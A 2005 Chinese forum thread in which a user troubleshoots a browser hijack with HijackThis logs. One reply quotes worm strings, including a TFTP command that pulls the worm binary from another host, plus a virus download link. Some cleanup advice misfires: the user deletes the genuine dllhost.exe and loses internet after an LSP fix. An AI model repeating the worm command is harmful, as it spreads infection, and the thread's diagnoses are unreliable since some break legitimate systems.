[求助]紧急呼救！浏览器被劫持，网友们来处理一下！

xdg3669 · 发表于 2005-7-3 10:05:13

[这个贴子最后由xdg3669在 2005/07/03 11:32am 第 2 次编辑]

我的系统这几天浏览网页时发现下面问题：
1、不管我用IE或MAXTHON浏览网页时，都会不时自动用IE打开网址为http://www.5xt.net/index.html新窗口,关闭后隔几分钟又重新打开，太烦了！又占用系统资源。经搜索注册表、系统、收藏夹也没有这个网址，IE主页是空白页，浏览器辅助块、右键均没有这个项目，用HijackThis1991zww搜索也找不到有关劫持项目！不知是控件还是脚本还是劫持其他什么的？

请大家给我诊断一下！

紫狐 · 发表于 2005-7-3 11:41:27

查一下启动项有什么异常的程序，再使用Browser Sentinel查看IE的BHOs等有没有加入什么插件，有的话处理掉。

xdg3669 · 发表于 2005-7-3 16:35:20

启动项没有什么异常的程序！BHO是以下几项：

O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: BrowseHelper Class - {80BF4637-D65B-43F3-BB60-C5DD3D5FB7B9} - C:\Program Files\KV2005\KvShell_1.dll
O2 - BHO: (no name) - {A5366673-E8CA-11D3-9CD9-0090271D075B} - (no file)
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O2 - BHO: SFP Class - {F236CC5A-F6E4-4011-9EED-C52FDF51CE3D} - C:\WINDOWS\system32\Sbhoplin.dll

6618 · 发表于 2005-7-3 16:54:46

O2 - BHO: (no name) - {A5366673-E8CA-11D3-9CD9-0090271D075B} - (no file)
O2 - BHO: SFP Class - {F236CC5A-F6E4-4011-9EED-C52FDF51CE3D} - C:\WINDOWS\system32\Sbhoplin.dll
这两项我不知道是什么，个人觉得有可疑，用HijackThis修复它们。

carry · 发表于 2005-7-3 16:59:09

O2 - BHO: (no name) - {A5366673-E8CA-11D3-9CD9-0090271D075B} - (no file)
O2 - BHO: SFP Class - {F236CC5A-F6E4-4011-9EED-C52FDF51CE3D} - C:\WINDOWS\system32\Sbhoplin.dll
删除他们,还有反浏览器劫持的工具太多了可以一用.

6618 · 发表于 2005-7-3 17:02:51

还搞不定的话，把你的HijackThis199 SCAN的结果（图）上传到这里来，大家帮你出谋献策，ijackThis我经常用，通常都是百战百战。

forsen · 发表于 2005-7-3 18:10:25

直接在注册表搜索关键字为那个网站的地址。很简单的~~！我也遇到过~~！

xdg3669 · 发表于 2005-7-3 21:03:09

[这个贴子最后由6618在 2005/07/03 10:14pm 第 2 次编辑]

我的HijackThis199 SCAN的结果：

当前运行的进程：
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Acronis\Schedule2\schedul2.exe
C:\PROGRA~1\KV2005\KVSrvXP.exe
C:\Program Files\KV2005\kvwsc.exe
C:\WINDOWS\system32\oodag.exe
C:\Program Files\SkyNet\FireWall\PFW.exe
C:\Program Files\Acronis\TrueImageEnterprise\TrueImageMonitor.exe
C:\Program Files\UPHClean\uphclean.exe
C:\Program Files\Common Files\Acronis\Schedule2\schedhlp.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\Program Files\KV2005\KVMonXP.kxp
C:\WINDOWS\WinPatrol\winpatrol.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\KV2005\TrojDie_1.kxp
C:\Program Files\KV2005\KRegEx.exe
C:\WINDOWS\system32\DllHost.exe
C:\Program Files\TweakAssist\AssistQRun.exe
D:\ProgramFiles\Totalcmd\totalcmd\Totalcmd.exe
C:\Program Files\FlashGet\flashget.exe
C:\Program Files\Skype\Phone\Skype.exe
C:\Program Files\Maxthon\Maxthon.exe
D:\ProgramFiles\HijackThis1991汉化版\HijackThis1991zww.exe
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: BrowseHelper Class - {80BF4637-D65B-43F3-BB60-C5DD3D5FB7B9} - C:\Program Files\KV2005\KvShell_1.dll
O2 - BHO: (no name) - {A5366673-E8CA-11D3-9CD9-0090271D075B} - (no file)
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O2 - BHO: SFP Class - {F236CC5A-F6E4-4011-9EED-C52FDF51CE3D} - C:\WINDOWS\system32\Sbhoplin.dll
O3 - IE工具栏增项: FlashGet Bar - {E0E899AB-F487-11D5-8D29-0050BA6940E3} - C:\PROGRA~1\FlashGet\fgiebar.dll
O3 - IE工具栏增项: CyberArticle Express - {769A6A36-ED24-4376-BC7C-80225BF35698} - C:\Program Files\CyberArticle\CAExp.dll
O3 - IE工具栏增项: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O3 - IE工具栏增项: BitCometBar - {3F1ABCDB-A875-46c1-8345-B72A4567E486} - C:\Program Files\BitComet\BitCometBar\BitCometBar0.1.dll
O3 - IE工具栏增项: 江民杀毒工具栏 - {B5A34A93-D538-43A7-8371-864CB6148D12} - C:\Program Files\KV2005\KvShell_1.dll
O4 - 启动项HKLM\\Run: [SKYNET Personal FireWall] C:\Program Files\SkyNet\FireWall\PFW.exe
O4 - 启动项HKLM\\Run: [nwiz] nwiz.exe /install
O4 - 启动项HKLM\\Run: [TrueImageMonitor.exe] C:\Program Files\Acronis\TrueImageEnterprise\TrueImageMonitor.exe
O4 - 启动项HKLM\\Run: [Acronis Scheduler2 Service] "C:\Program Files\Common Files\Acronis\Schedule2\schedhlp.exe"
O4 - 启动项HKLM\\Run: [SoundMan] SOUNDMAN.EXE
O4 - 启动项HKLM\\Run: [KvMonXP] C:\Program Files\KV2005\KVMonXP.kxp /auto
O4 - 启动项HKLM\\Run: [WinPatrol] C:\WINDOWS\WinPatrol\winpatrol.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: AutoCAD 启动加速器.lnk = C:\Program Files\Common Files\Autodesk Shared\acstart16.exe
O8 - IE右键菜单中的新增项目: 使用网际快车下载 - C:\Program Files\FlashGet\jc_link.htm
O8 - IE右键菜单中的新增项目: 使用网际快车下载全部链接 - C:\Program Files\FlashGet\jc_all.htm
O8 - IE右键菜单中的新增项目: 导出到 Microsoft Office Excel(&X) - res://C:\PROGRA~1\MICROS~1\OFFICE11\EXCEL.EXE/3000
O8 - IE右键菜单中的新增项目: 添加到QQ自定义面板 - C:\Program Files\Tencent\QQ\AddPanel.htm
O8 - IE右键菜单中的新增项目: 添加到QQ表情 - C:\Program Files\Tencent\QQ\AddEmotion.htm
O8 - IE右键菜单中的新增项目: 添加到天极收藏夹 - C:\WINDOWS\system32\YeskyComponents\AddFavorite.htm
O8 - IE右键菜单中的新增项目: 用QQ彩信发送该图片 - C:\Program Files\Tencent\QQ\SendMMS.htm
O10 - 未知的文件在 Winsock LSP: c:\windows\system32\kvwspxp.dll
O10 - 未知的文件在 Winsock LSP: c:\windows\system32\kvwspxp.dll
O10 - 未知的文件在 Winsock LSP: c:\windows\system32\kvwspxp.dll
O17 - HKLM\System\CCS\Services\Tcpip\..\{F93EF27A-8DA0-4A03-8E45-38CE4AC3EB6F}: NameServer = [color=#DC143C]这是楼主的DNS，6618编辑掉了。
O20 - AppInit_DLLs: APIHookDll.dll
O23 - NT 服务: Acronis Scheduler2 Service (AcrSch2Svc) - Acronis - C:\Program Files\Common Files\Acronis\Schedule2\schedul2.exe
O23 - NT 服务: Adobe LM Service - Unknown owner - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - NT 服务: Autodesk Licensing Service - Autodesk - C:\Program Files\Common Files\Autodesk Shared\Service\AdskScSrv.exe
O23 - NT 服务: KVSrvXP - JiangMin New Tech Ltd. - C:\PROGRA~1\KV2005\KVSrvXP.exe
O23 - NT 服务: KVWSC - Jiangmin Co.Ltd - C:\Program Files\KV2005\kvwsc.exe
O23 - NT 服务: O&O Defrag - O&O Software GmbH - C:\WINDOWS\system32\oodag.exe
O23 - NT 服务: VMware Authorization Service (VMAuthdService) - VMware, Inc. - C:\Program Files\VMware\VMware Workstation\vmware-authd.exe
O23 - NT 服务: VMware DHCP Service (VMnetDHCP) - VMware, Inc. - C:\WINDOWS\system32\vmnetdhcp.exe

大家帮看看吧！

还有：

O2 - BHO: (no name) - {A5366673-E8CA-11D3-9CD9-0090271D075B} - (no file)
O2 - BHO: SFP Class - {F236CC5A-F6E4-4011-9EED-C52FDF51CE3D} - C:\WINDOWS\system32\Sbhoplin.dll

第一项删后不久又会出现！
第二项好象是广州众达天网IE保护，是天网防火墙吧？

6618 · 发表于 2005-7-3 21:10:57

[这个贴子最后由6618在 2005/07/03 09:37pm 第 4 次编辑]

O10 - 未知的文件在 Winsock LSP: c:\windows\system32\kvwspxp.dll
O10 - 未知的文件在 Winsock LSP: c:\windows\system32\kvwspxp.dll
O10 - 未知的文件在 Winsock LSP: c:\windows\system32\kvwspxp.dll
[color=#FF1493]上面三个是Winsock LSP“浏览器绑架
O4 - 启动项HKLM\\Run: [nwiz] nwiz.exe /install
[color=#FF00FF]这一项有可疑。
O20 - AppInit_DLLs: APIHookDll.dll
[color=#FF00FF]这一项有可疑。

xdg3669 · 发表于 2005-7-3 21:31:16

这三个应是江民杀毒的文件吧？

6618 · 发表于 2005-7-3 21:35:32

[这个贴子最后由6618在 2005/07/03 09:43pm 第 2 次编辑]

看了你的HijackThis的扫描结果，个人觉得你开机启动的项目很多，启动的额外服务也多，如：
O23 - NT 服务: VMware Authorization Service (VMAuthdService) - VMware, Inc. - C:\Program Files\VMware\VMware Workstation\vmware-authd.exe
O23 - NT 服务: VMware DHCP Service (VMnetDHCP) - VMware, Inc. - C:\WINDOWS\system32\vmnetdhcp.exe
这是虚拟机的服务。
O23 - NT 服务: Acronis Scheduler2 Service (AcrSch2Svc) - Acronis - C:\Program Files\Common Files\Acronis\Schedule2\schedul2.exe
O23 - NT 服务: Adobe LM Service - Unknown owner - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
这两个，个人觉得没必要。可修复掉。
你装了江民2005、天网防火墙、winpatrol.exe，结果IE还是给绑架了，唉，杀毒软件！

6618 · 发表于 2005-7-3 21:41:35

下面引用由xdg3669在 2005/07/03 09:31pm 发表的内容：
这三个应是江民杀毒的文件吧？

不是的！
C:\Program Files\KV2005\TrojDie_1.kxp
C:\Program Files\KV2005\KRegEx.exe
C:\Program Files\KV2005\KvShell_1.dll
O23 - NT 服务: KVSrvXP - JiangMin New Tech Ltd. - C:\PROGRA~1\KV2005\KVSrvXP.exe
O23 - NT 服务: KVWSC - Jiangmin Co.Ltd - C:\Program Files\KV2005\kvwsc.exe
上面的五个才是KV2005，那三个是迷惑你的。

xdg3669 · 发表于 2005-7-3 21:49:10

[这个贴子最后由6618在 2005/07/03 09:55pm 第 1 次编辑]

O10 - 未知的文件在 Winsock LSP: c:\windows\system32\kvwspxp.dll
O10 - 未知的文件在 Winsock LSP: c:\windows\system32\kvwspxp.dll
O10 - 未知的文件在 Winsock LSP: c:\windows\system32\kvwspxp.dll
这三个应是江民杀毒的文件吧？
O4 - 启动项HKLM\\Run: [nwiz] nwiz.exe /install
这一项是显示卡的
O20 - AppInit_DLLs: APIHookDll.dll
这一项是木马克星的。
O23 - NT 服务: Autodesk Licensing Service - Autodesk - C:\Program Files\Common Files\Autodesk Shared\Service\AdskScSrv.exe
这个服务是Autodesk autocad的。

显卡的？如果是，也可以删掉，还装了木马克星？

6618 · 发表于 2005-7-3 21:51:14

[这个贴子最后由6618在 2005/07/03 10:40pm 第 2 次编辑]

下面引用由xdg3669在 2005/07/03 09:03pm 发表的内容：
第一项删后不久又会出现！
第二项好象是广州众达天网IE保护，是天网防火墙吧？

删后不久又出现，是因为你刚删掉它，病毒又自行生回去了。
不是天网防火墙，不管它是什么，既然防不了毒，删掉也无防，省得在占系统资源。

6618 · 发表于 2005-7-3 22:00:59

6618的电脑HijackThis v1.99的描结果是这样的：

Logfile of HijackThis v1.99.0
Scan saved at 21:52:10, on 2005-7-3
Platform: Unknown Windows (WinNT 5.02.3790 SP1)
MSIE: Internet Explorer v6.00 SP1 (6.00.3790.1830)
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Network Associates\Common Framework\FrameworkService.exe
C:\Program Files\Network Associates\VirusScan\mcshield.exe
C:\Program Files\Network Associates\VirusScan\vstskmgr.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Network Associates\VirusScan\SHSTAT.EXE
C:\Program Files\Network Associates\Common Framework\UpdaterUI.exe
C:\Program Files\Common Files\Network Associates\TalkBack\tbmon.exe
C:\Program Files\SnowFox\MiniClock\MiniClock.exe
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\FlashGet\flashget.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\Internet Explorer\IEXPLORE.EXE
D:\software\HIJACKTHIS1.99\HIJACKTHIS.EXE
O4 - HKLM\..\Run: [ShStatEXE] "C:\Program Files\Network Associates\VirusScan\SHSTAT.EXE" /STANDALONE
O4 - HKLM\..\Run: [McAfeeUpdaterUI] "C:\Program Files\Network Associates\Common Framework\UpdaterUI.exe" /StartedFromRunKey
O4 - HKLM\..\Run: [Network Associates Error Reporting Service] "C:\Program Files\Common Files\Network Associates\TalkBack\tbmon.exe"
O4 - HKLM\..\Run: [MiniClock] C:\Program Files\SnowFox\MiniClock\MiniClock.exe
O4 - HKLM\..\Run: [ExFilter] Rundll32.exe "C:\PROGRA~1\CNNIC\Cdn\cdnspie.dll,ExecFilter solo"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O8 - Extra context menu item: &使用迅雷下载 - C:\Program Files\Thunder Network\Thunder\geturl.htm
O8 - Extra context menu item: &使用迅雷下载全部链接 - C:\Program Files\Thunder Network\Thunder\getAllurl.htm
O8 - Extra context menu item: 使用网际快车下载 - C:\Program Files\FlashGet\jc_link.htm
O8 - Extra context menu item: 使用网际快车下载全部链接 - C:\Program Files\FlashGet\jc_all.htm
O9 - Extra button: 中文上网 - {35980F6E-A137-4E50-953D-813BB8556899} - C:\WINDOWS\system32\shdocvw.dll
O9 - Extra ';Tools'; menuitem: 中文上网 - {35980F6E-A137-4E50-953D-813BB8556899} - C:\WINDOWS\system32\shdocvw.dll
O17 - HKLM\System\CCS\Services\Tcpip\..\{78DCF6D2-ADEE-47C2-9EEA-3599FDFD4184}: NameServer = 我的DNS（6618注）
O18 - Protocol: about - {3050F406-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: cdl - {3DD53D40-7B8B-11D0-B013-00AA0059CE02} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: file - {79EAC9E7-BAF9-11CE-8C82-00AA004BA90B} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: ftp - {79EAC9E3-BAF9-11CE-8C82-00AA004BA90B} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: gopher - {79EAC9E4-BAF9-11CE-8C82-00AA004BA90B} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: http - {79EAC9E2-BAF9-11CE-8C82-00AA004BA90B} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: https - {79EAC9E5-BAF9-11CE-8C82-00AA004BA90B} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: ic32pp - {BBCA9F81-8F4F-11D2-90FF-0080C83D3571} - C:\WINDOWS\wc98pp.dll
O18 - Protocol: its - {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\WINDOWS\system32\itss.dll
O18 - Protocol: javascript - {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: local - {79EAC9E7-BAF9-11CE-8C82-00AA004BA90B} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: mailto - {3050F3DA-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: mhtml - {05300401-BCBC-11D0-85E3-00C04FD85AB4} - C:\WINDOWS\system32\inetcomm.dll
O18 - Protocol: mk - {79EAC9E6-BAF9-11CE-8C82-00AA004BA90B} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: ms-its - {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\WINDOWS\system32\itss.dll
O18 - Protocol: msdaipp - (no CLSID) - (no file)
O18 - Protocol: mso-offdap - {3D9F03FA-7A94-11D3-BE81-0050048385D1} - C:\PROGRA~1\COMMON~1\MICROS~1\WEBCOM~1\10\OWC10.DLL
O18 - Protocol: res - {3050F3BC-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: sysimage - {76E67A63-06E9-11D2-A840-006008059382} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: vbscript - {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: wia - {13F3EA8B-91D7-4F0A-AD76-D2853AC8BECE} - C:\WINDOWS\system32\wiascr.dll
O23 - Service: McAfee Framework 服务 - Network Associates, Inc. - C:\Program Files\Network Associates\Common Framework\FrameworkService.exe
O23 - Service: Network Associates McShield - Network Associates, Inc. - C:\Program Files\Network Associates\VirusScan\mcshield.exe
O23 - Service: Network Associates Task Manager - Network Associates, Inc. - C:\Program Files\Network Associates\VirusScan\vstskmgr.exe

xdg3669 · 发表于 2005-7-3 22:04:57

好的！多谢指教！

6618 · 发表于 2005-7-3 22:05:01

[这个贴子最后由6618在 2005/07/03 10:23pm 第 1 次编辑]

O10 - 未知的文件在 Winsock LSP: c:\windows\system32\kvwspxp.dll
O10 - 未知的文件在 Winsock LSP: c:\windows\system32\kvwspxp.dll
O10 - 未知的文件在 Winsock LSP: c:\windows\system32\kvwspxp.dll
这三个应该不是KV2005的文件，是O10 Winsock LSP“浏览器绑架”，可以修复掉！！
近两年没用江民了，也不知道现的KV是怎样的，6618觉得还是不要那么武断，所以重新编辑了一下。

天空飞鸟 · 发表于 2005-7-3 22:20:00

O4 - 启动项HKLM\\Run: [nwiz] nwiz.exe /install
这个是正常的。
看看有无可疑的进程，用IceSword查看。并结束可疑进程，删掉文件，修复注册表。

6618 · 发表于 2005-7-3 22:28:11

[这个贴子最后由6618在 2005/07/03 10:34pm 第 1 次编辑]

下面引用由天空飞鸟在 2005/07/03 10:20pm 发表的内容：
O4 - 启动项HKLM\\Run: nwiz.exe /install
这个是正常的。
看看有无可疑的进程，用IceSword查看。并结束可疑进程，删掉文件，修复注册表。

正如楼主所说，这是显卡的，即启动后，在任务栏的那个可调整分辨率的，其实不让它启动更好，不用占那么多资源，而且不会防碍显卡的正常使用。
用IceSword（冰刀）来查查也是个不错的选择，总之，大家都来出谋献策吧。

6618 · 发表于 2005-7-3 23:16:17

这是6618刚从一个论坛的精华帖中看到的：
如果大家在自己的system32 目录里的WINS目录里发现DLLHOST.EXE 和SVCHOST.EXE那么你肯定中毒了。。请自己在启动里删除。。并且删除这2个文件。。传染比较快。。希望大家安装防护墙，，这是中国人自己编译的病毒
DLLHOST.EXE里面有这样的话!
=========== I love my wife & baby ~~~ Welcome Chian~~~ Notice: 2004 will remove myself~~ sorry zhongli~~~=========== wins http://download.microsoft.com/downl...980-x86-KOR.exe ;; http://download.microsoft.com/downl...980-x86-CHT.exe ;; http://download.microsoft.com/downl...980-x86-CHS.exe ;; http://download.microsoft.com/downl...980-x86-ENU.exe ;; http://download.microsoft.com/downl...980-x86-KOR.exe ;; http://download.microsoft.com/downl...980-x86-CHT.exe ;; http://download.microsoft.com/downl...980-x86-CHS.exe ;; http://download.microsoft.com/downl...980-x86-ENU.exe ;; tftp -i %s get svchost.exe wins\SVCHOST.EXE
这2个文件在WINS目录里。。
这决对不是玩笑！！！　　

如果是XP系统,那么这文件应该是在*:\WINDOWS\SYSTEM32\WINS\里
如果是NT系统..比如2000.那么就应该是在*:\winnt\system32\wins\里
这2个文件大家想研究可以在这里下
http://hy88.nease.net/pingvirus.rar
传染是利用TFTP上传的，，如果大家用不上这东东。完全可以删除TFTP.EXE

正常的SVCHOST.EXE是在SYSTEM32目录里...这个2个文件决对不正常,希望大家警惕
如果你的防护墙被PING..那么你那里有一定有机器中了!!

6618 · 发表于 2005-7-3 23:17:38

我看到楼主的进程里也有DLLHOST.EXE，楼主不防按上面说的去看看。

赌东道 · 发表于 2005-7-4 00:18:18

佩服，搞的好复杂~~
看的一知半解，保存了好好研究一下。

xdg3669 · 发表于 2005-7-4 11:17:27

[这个贴子最后由xdg3669在 2005/07/04 01:05pm 第 3 次编辑]

[color=#DC143C]昨晚用LSPFix汉化版.exe修复LSP：
O10 - 未知的文件在 Winsock LSP: c:\windows\system32\kvwspxp.dll
O10 - 未知的文件在 Winsock LSP: c:\windows\system32\kvwspxp.dll
O10 - 未知的文件在 Winsock LSP: c:\windows\system32\kvwspxp.dll
[color=#DC143C]出现了不能上网的问题！该怎样修复？
O23 - NT 服务: VMware Authorization Service (VMAuthdService) - VMware, Inc. - C:\Program Files\VMware\VMware Workstation\vmware-authd.exe
O23 - NT 服务: VMware DHCP Service (VMnetDHCP) - VMware, Inc. - C:\WINDOWS\system32\vmnetdhcp.exe

[color=#DC143C]虚拟机的服务我没有启动！我原来都改为手动了！不知为何还会出现?
我搜索了系统、启动项DLLHOST.EXE 和SVCHOST.EXE这两个文件都在C:\WINDOWS\SYSTEM32下与您说得位置不对能否删除？

[color=#DC143C]DLLHOST.EXE 文件属性如下：
C:\WINDOWS\system32\dllhost.exe
于 Microsoft Windows XP Professional Edition version 5.2600

文件版本信息:
版本语言: 英语(美国)
   CompanyName: Microsoft Corporation
   FileDescription: COM Surrogate
   FileVersion: 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
   InternalName: dllhost.exe
   LegalCopyright: ? Microsoft Corporation. All rights reserved.
   OriginalFilename: dllhost.exe
   ProductName: Microsoft? Windows? Operating System
   ProductVersion: 5.1.2600.2180
创建日期    : 2004/09/02  20:00:00
最后修改日期 : 2004/09/02  20:00:00
最后访问日期 : 2005/03/19  11:21:54
文件大小: 5120 字节 ( 5.000 KB, 0.005 MB )
文件版本信息大小 : 1804 字节
文件类型 : 动态链接库 (0x2)
目标系统 : Win32 API (Windows NT) (0x40004)
文件/产品版本    : 5.1.2600.2180 / 5.1.2600.2180
语言    : 英语(美国) (0x409)
字符集    : 1200 (ANSI - Unicode (BMP of ISO 10646)) (0x4B0)
创建信息:
调试版本    : 否
补丁后版本    : 否
预发版本       : 否
专用版本    : 否
特别创建    : 否

[color=#E9967A]是否有问题?

[color=#DC143C]当我把DLLHOST.EXE 文件删除以后用HijackThis_zww汉化版扫描出现多下面二项：
O23 - NT 服务: COM+ System Application (COMSysApp) - Unknown owner - C:\WINDOWS\system32\dllhost.exe (file missing)
O23 - NT 服务: MS Software Shadow Copy Provider (SwPrv) - Unknown owner - C:\WINDOWS\system32\dllhost.exe (file missing)

请教是什么问题？
再次重新用LSPFix汉化版.exe修复：

O10 - 未知的文件在 Winsock LSP: c:\windows\system32\kvwspxp.dll
O10 - 未知的文件在 Winsock LSP: c:\windows\system32\kvwspxp.dll
O10 - 未知的文件在 Winsock LSP: c:\windows\system32\kvwspxp.dll
仍然是不能上网的问题！包括IE、QQ等！

xdg3669 · 发表于 2005-7-4 14:08:33

[这个贴子最后由6618在 2005/07/04 04:24pm 第 1 次编辑]

XDG3669今天的电脑HijackThis v1.99的描结果是这样的：
当前运行的进程：
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Common Files\Acronis\Schedule2\schedul2.exe
C:\PROGRA~1\KV2005\KVSrvXP.exe
C:\Program Files\KV2005\kvwsc.exe
C:\WINDOWS\system32\oodag.exe
C:\PROGRA~1\SkyNet\FireWall\pfw.exe
C:\Program Files\Acronis\TrueImageEnterprise\TrueImageMonitor.exe
C:\Program Files\Common Files\Acronis\Schedule2\schedhlp.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\WINDOWS\system32\dllhost.exe
C:\Program Files\UPHClean\uphclean.exe
C:\Program Files\KV2005\KVMonXP.kxp
C:\WINDOWS\WinPatrol\winpatrol.exe
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\dllhost.exe
C:\Program Files\KV2005\TrojDie_1.kxp
C:\Program Files\KV2005\KRegEx.exe
C:\WINDOWS\system32\DllHost.exe
D:\ProgramFiles\Totalcmd\totalcmd\Totalcmd.exe
C:\Program Files\Maxthon\Maxthon.exe
D:\ProgramFiles\HijackThis1991汉化版\HijackThis1991zww.exe
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: BrowseHelper Class - {80BF4637-D65B-43F3-BB60-C5DD3D5FB7B9} - C:\Program Files\KV2005\KvShell_1.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O3 - IE工具栏增项: FlashGet Bar - {E0E899AB-F487-11D5-8D29-0050BA6940E3} - C:\PROGRA~1\FlashGet\fgiebar.dll
O3 - IE工具栏增项: CyberArticle Express - {769A6A36-ED24-4376-BC7C-80225BF35698} - C:\Program Files\CyberArticle\CAExp.dll
O3 - IE工具栏增项: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O3 - IE工具栏增项: BitCometBar - {3F1ABCDB-A875-46c1-8345-B72A4567E486} - C:\Program Files\BitComet\BitCometBar\BitCometBar0.1.dll
O3 - IE工具栏增项: 江民杀毒工具栏 - {B5A34A93-D538-43A7-8371-864CB6148D12} - C:\Program Files\KV2005\KvShell_1.dll
O4 - 启动项HKLM\\Run: [SKYNET Personal FireWall] C:\PROGRA~1\SkyNet\FireWall\pfw.exe
O4 - 启动项HKLM\\Run: [TrueImageMonitor.exe] C:\Program Files\Acronis\TrueImageEnterprise\TrueImageMonitor.exe
O4 - 启动项HKLM\\Run: [Acronis Scheduler2 Service] "C:\Program Files\Common Files\Acronis\Schedule2\schedhlp.exe"
O4 - 启动项HKLM\\Run: [SoundMan] SOUNDMAN.EXE
O4 - 启动项HKLM\\Run: [KvMonXP] C:\Program Files\KV2005\KVMonXP.kxp /auto
O4 - 启动项HKLM\\Run: [WinPatrol] C:\WINDOWS\WinPatrol\winpatrol.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: AutoCAD 启动加速器.lnk = C:\Program Files\Common Files\Autodesk Shared\acstart16.exe
O8 - IE右键菜单中的新增项目: 使用网际快车下载 - C:\Program Files\FlashGet\jc_link.htm
O8 - IE右键菜单中的新增项目: 使用网际快车下载全部链接 - C:\Program Files\FlashGet\jc_all.htm
O8 - IE右键菜单中的新增项目: 导出到 Microsoft Office Excel(&X) - res://C:\PROGRA~1\MICROS~1\OFFICE11\EXCEL.EXE/3000
O8 - IE右键菜单中的新增项目: 添加到天极收藏夹 - C:\WINDOWS\system32\YeskyComponents\AddFavorite.htm
O10 - 未知的文件在 Winsock LSP: c:\windows\system32\kvwspxp.dll
O10 - 未知的文件在 Winsock LSP: c:\windows\system32\kvwspxp.dll
O10 - 未知的文件在 Winsock LSP: c:\windows\system32\kvwspxp.dll
O14 - IERESET.INF: START_PAGE_URL=http://mayi.01www.com/
O16 - DPF: {17492023-C23A-453E-A040-C7C580BBF700} (Windows Genuine Advantage Validation Tool) - http://go.microsoft.com/fwlink/?linkid=36467&clcid=0x409
O17 - HKLM\System\CCS\Services\Tcpip\..\{F93EF27A-8DA0-4A03-8E45-38CE4AC3EB6F}: NameServer = 安全起见，我把楼主的DNS编辑掉了，其他没改。
O23 - NT 服务: Acronis Scheduler2 Service (AcrSch2Svc) - Acronis - C:\Program Files\Common Files\Acronis\Schedule2\schedul2.exe
O23 - NT 服务: Autodesk Licensing Service - Autodesk - C:\Program Files\Common Files\Autodesk Shared\Service\AdskScSrv.exe
